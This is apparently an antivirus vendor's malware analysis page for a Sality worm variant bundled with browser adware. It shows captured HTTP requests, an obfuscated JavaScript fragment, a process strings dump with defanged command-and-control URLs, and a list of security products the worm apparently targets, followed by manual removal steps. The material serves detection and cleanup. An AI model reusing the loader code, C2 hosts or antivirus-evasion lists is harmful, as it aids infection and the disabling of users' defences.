cache-a.akamaihd.net/sub/h0982be/__CROSSRIDER_EXTENDED_SUB_ID__/l.<<< skipped >>>

GET /plugins/mins/354.js?ver=2&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1418039174"

Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT

Cache-Control: max-age=183

Content-Length: 122978

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668153.cds009.fr7.c

__CTG_MAPPING__={"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c8127573
2dcf0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909ac
8e17ae3cc3c91cd7ae9f","dccefc9affe37ba60b49d0a4789ce042","55a7d0f38334
87778c3bdff8b2096e93","0212ae9fc1eeb53f9f641335b804d75e","d5e783fe22ab
e91aae7179d10a958497","9c8a818246bc677ef54725340e9c5a98","6871592501ed
31709e241750c4363fce","1c5e3f677b22b8257c1df15a70e7df26","daf4c4488123
ddadb30a7adaadb18b54","11fbd0aa23a016619379552c438b081a","fcaed5b82116
cd700a0949772ad8ff49","6ac10c5f77cf4309c731a1edca41f357","5c83bc2a9fe1
1b248ee7a0577c7d8fdd","b4724ce8e3ac8d971ea648c70f1f3a28","5cfdb867e963
74c7883b31d6928cc4cb","5bc25469aea12b844db6b49146c3e0ed","15830c2f3218
394a63d70b23d235cc1c","7f5e73ea77ef99619089c3857dafdcb4","029c1c42a916
0c3cf3db1a687f11ff72","e84400c002083678aa69041045895fae","da0239e7da03
30fb26ef37dd1d940044","993439d6f7a4548cae1381c9073cbee1","24414caa6316
a5694f77499fa604e5b1","340d70f50a7a4507bc874c8108bb45bc","2e44b2f1bf1b
2b87d2be9f94ad2a2a35","5484845885ffd608ebb0ad1ac39434d4","96eb5194f361
b233bf8fb9a80267f1de","91e4f116b8a4f5258b982d3c10910bdf","5638298177fc
6af5190590244d6d8035","7712b7ac7ec5d5966fb35b1425d0283f","1080cee006e8
4c91858613ce7dde99fb","428d0f3d623a15db6cacb689e86b4352","8b25ca5c09e1
0312a1567fb3d7f82c07","84dcb17eaafb9d32908759a607838c8b","fcbed3a6b1e5
92c8efddf3f925b26b7f","7eae142b683afcf5aee231291c679877","9bcd814058bc
f8f6497f0495e0a2fd71","6bb8719fca4581212b3aa47da8755163","adb2121658b6
9c9a701f270c8faba02f","5694f231cd01d8222d59557c56cef9a7","b7444e18

<<< skipped >>>

GET /plugins/mins/246.js?ver=17&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1424173488"

Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT

Cache-Control: max-age=900

Content-Length: 7448

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668153.cds009.fr7.c
var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","5
0","51","52","53","54","55","56","57","60","installer","getAdditionalI
nfo","isFunction","utils","isDefined","asw","isArray","length","toLowe
rCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds"
,"installer_verifier","","string","charCodeAt","replace","match","appl
y","fromCharCode","Base64","decode","call","parse","JSON","monetizatio
n","internal","plugins","un","def","ined","pluginId","getExtendedSubId
","function","slice","getSubId","getTime","_","join","na","httpUrl","_
_RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INST
ALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","
__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","app
Info","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","ge
tUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__C
ROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__
CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inli
neJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,
k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_
0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_
0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],
mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59
[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_
0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[<<< skipped >>>

GET /installer_updates/001360/update.json HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: update.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 16:42:02 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1395746822"

Last-Modified: Tue, 25 Mar 2014 11:27:02 GMT

Cache-Control: max-age=854

Content-Length: 39

Content-Type: text/plain; charset=UTF-8

X-HW: 1427668128.dop007.fr7.t,1427668128.cds024.fr7.s,1427668127.dop005.se1.r,1427668128.cds015.se1.c,1427668128.cds024.fr7.p

{"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Sun, 29 
Mar 2015 16:42:02 GMT..Keep-Alive: timeout=5, max=100..Connection: Kee
p-Alive..Accept-Ranges: bytes..ETag: "1395746822"..Last-Modified: Tue,
 25 Mar 2014 11:27:02 GMT..Cache-Control: max-age=854..Content-Length:
 39..Content-Type: text/plain; charset=UTF-8..X-HW: 1427668128.dop007.
fr7.t,1427668128.cds024.fr7.s,1427668127.dop005.se1.r,1427668128.cds01
5.se1.c,1427668128.cds024.fr7.p..{"update_from_version":"NA","url":"NA
"}..

GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128 HTTP/1.1

Host: stats.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 9/C9HI4pJESP/NiZTc7FSTFSybRP1rJLyKnroec5aBB9aKP0a/Om1k/AaNQxEs hDe BapG6zIA=

x-amz-request-id: 9E01DCC0110FBE03

Date: Sun, 29 Mar 2015 22:28:50 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9/C9HI
4pJESP/NiZTc7FSTFSybRP1rJLyKnroec5aBB9aKP0a/Om1k/AaNQxEs hDe BapG6zIA=
..x-amz-request-id: 9E01DCC0110FBE03..Date: Sun, 29 Mar 2015 22:28:50 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163 HTTP/1.1

Host: stats.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: mkEOHDM1Vypc8tlMASGGMuRgveUrP8Tt/MwC7d4 BJAoI3kSQikFw75bI6 5g1QWXNloXpiBPyA=

x-amz-request-id: 0FB85ED08DFF4B6D

Date: Sun, 29 Mar 2015 22:29:24 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

The Worm connects to the servers at the folowing location(s):

netsh.exe_3068:

.text

`.data

.rsrc

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

MPRAPI.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

USER32.dll

iphlpapi.dll

[%S] %S

netsh.pdb

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

RegQueryInfoKeyW

GetProcessHeap

GetConsoleOutputCP

ntdll.dll

NETSH.EXE

MatchCmdLine

MatchTagsInCmdLine

{X-X-X-XX-XXXXXX}

netsh.exe

Error %d in FormatMessageW()

select * from Win32_OperatingSystem

\\%s\root\cimv2

5.1.2600.5512 (xpsp.080413-0852)

Windows

Operating System

5.1.2600.5512

LFirst, add the protocol to the transport, and then add it to the interface.

*The requested transport is not available.

%1!s! ipmontr.dll

The above command installs ipmontr.dll in netsh.

is removed, it is no longer supported by netsh.

The command cannot be executed.

*Windows cannot open the file named %1!s!.

.The commit call to %1!s! cannot be completed.

.Sets the current machine on which to operate.

name - Name of the machine on which to operate

Sets the current machine on which to operate. If a machine name

%1!s! open c:\logfiles\logfile.txt

.Error creating key for %1!s! in the registry.

.Error deleting key for %1!s! in the registry.

netsh.exe_3068_rwx_00480000_00002000:

SHELL32.DLL

ShellExecuteA

KERNEL32.DLL

.text

netsh.exe_3068_rwx_004D0000_00001000:

|netsh.exeM_3068_

Explorer.EXE_884_rwx_014D0000_00002000:

SHELL32.DLL

ShellExecuteA

KERNEL32.DLL

.text

Explorer.EXE_884_rwx_02050000_00001000:

|explorer.exeM_884_

Explorer.EXE_884_rwx_024F0000_01033000:

c:\windows

hXXp://VVV.ledyazilim.com/logo.gif

hXXp://ksandrafashion.com/logo.gif

hXXp://VVV.lafyeri.com/images/logo.gif

hXXp://kulppasur.com/logo.gif

hXXp://toalladepapel.com.ar/images/logo.gif

hXXp://VVV.ecole-saint-simon.net/index_top/logo.gif

hXXp://lazarea.ro/images/logo.gif

hXXp://koonadance2.com/images/logo.gif

hXXp://kuplu.bel.tr/images/logo.gif

hXXp://VVV.liderancaspoliticas.com.br/logo.gif

hXXp://VVV.legalbilgisayar.com/img/logo.gif

hXXp://lifecom24.co.cc/images/logo.gif

%System%\drivers\ghltmn.sys

12047188183

SHELL32.DLL

ShellExecuteA

KERNEL32.DLL

.text

hXXp://89.119.67.154/testo5/

hXXp://kukutrustnet777.info/home.gif

hXXp://kukutrustnet888.info/home.gif

hXXp://kukutrustnet987.info/home.gif

h.rdata

H.data

.reloc

ntoskrnl.exe

Opera/8.89 (Windows NT 6.0; U; en)

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion

hXXp://VVV.klkjwre9fqwieluoi.info/

hXXp://kukutrustnet777888.info/

Software\Microsoft\Windows\CurrentVersion\policies\system

Software\Microsoft\Windows\ShellNoRoam\MUICache

%s:*:Enabled:ipsec

NOTEPAD.EXE

WINMINE.EXE

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

GdiPlus.dll

hXXp://

hXXp://klkjwre77638dfqwieuoi888.info/

VVV.microsoft.com

?%x=%d

&%x=%d

SYSTEM.INI

USER32.DLL

.%c%s

\\.\abp470n5

WINDOWS

NTDLL.DLL

autorun.inf

ADVAPI32.DLL

win%s.exe

%s.exe

WININET.DLL

InternetOpenUrlA

avast! Web Scanner

Avira AntiVir Premium WebGuard

BackWeb Plug-in - 4476822

cmdGuard

cmdAgent

Eset HTTP Server

ProtoPort Firewall service

SpIDer FS Monitor for Windows NT

Symantec Password Validation

tcpsr

WebrootDesktopFirewallDataService

WebrootFirewall

%d%d.tmp

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

%s\%s

%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats

Software\Microsoft\Windows\CurrentVersion\Ext\Stats

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Explorer.exe

ASHWEBSV.

DRWEB32W.

DRWEBSCD.

DRWEBUPW.

DWEBLLIO

DWEBIO

FSGUIEXE.

MCVSSHLD.

NPFMSG.

SYMSPORT.

WEBPROXY.

WEBSCANX.

WEBTRAP.

sfc_os.dll

M_%d_

%c%d_%d

?456789:;<=

!"#$%&'()* ,-./0123

GetWindowsDirectoryA

GetProcessHeap

WinExec

RegEnumKeyExA

RegDeleteKeyA

RegOpenKeyExA

RegCreateKeyA

RegCloseKey

SHFileOperationA

.rdata

.data

.xdata

@.CRT

GUrlA'G5

HTTP)s'cfp

Lxo.ENHCDM

wWEBWUPD

n .pZ

'()* ,-./01230 0

.HpT.#[3

av%xQ

ADVAPI32.dll

MSVCRT.dll

SHELL32.dll

USER32.dll

WS2_32.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560
Qvalysaly.exe:2176
%original file name%.exe:1860
875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180
875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508
WINMINE.EXE:1048
WINMINE.EXE:3776
WINMINE.EXE:544
Freeven pro-codedownloader.exe:2144
Freeven pro-codedownloader.exe:720
NOTEPAD.EXE:2288
NOTEPAD.EXE:2120
NOTEPAD.EXE:2332
NOTEPAD.EXE:556
NOTEPAD.EXE:836
NOTEPAD.EXE:2228
NOTEPAD.EXE:3472
NOTEPAD.EXE:2524
NOTEPAD.EXE:2604
NOTEPAD.EXE:3804
NOTEPAD.EXE:2896
NOTEPAD.EXE:3944
NOTEPAD.EXE:1136
NOTEPAD.EXE:3852
NOTEPAD.EXE:2152
NOTEPAD.EXE:296
NOTEPAD.EXE:2516
NOTEPAD.EXE:2188
NOTEPAD.EXE:3896
netsh.exe:2816
netsh.exe:872
notepad.exe:2056
regsvr32.exe:2376
Freeven pro-bg.exe:2444
Delete the original Worm file.
Delete or disinfect the following files created/modified by the Worm:

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (5 bytes)
%Program Files%\Freeven pro\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-4.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (784 bytes)
%Program Files%\Freeven pro\Freeven pro-bg.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (195663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\Freeven pro\utils.exe (68126 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (2 bytes)
%Program Files%\Freeven pro\54248.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Freeven pro\Freeven pro-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (453 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-3.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (2 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe (13122 bytes)
%Program Files%\Freeven pro\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (4 bytes)
%Program Files%\Freeven pro\360-54248.crx (1425 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (3312 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (70 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-1.job (70 bytes)
%Program Files%\Freeven pro\54248.xpi (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (1 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (12 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (501 bytes)
%Program Files%\Freeven pro\Freeven pro.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (741774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (2392 bytes)
%Program Files%\Freeven pro\Freeven pro-bho.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (288023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (39 bytes)
%WinDir%\system.ini (72 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\READER_SL.EXE (432 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (217971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (861462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (232535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00125F9D_Rar\%original file name%.exe (53142 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\220[1].js (19033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\375[1].js (679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\set_campaign_id_m[1].js (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\380[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\200[1].js (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\9[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\7[1].js (683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\334[1].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\288[1].js (963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\app_code[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\281[1].js (455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\91[1].js (87921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\345[1].js (645 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\260[1].js (823 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Win32.Sality.OG_415abb1224

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Win32.Sality.OG_415abb1224

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet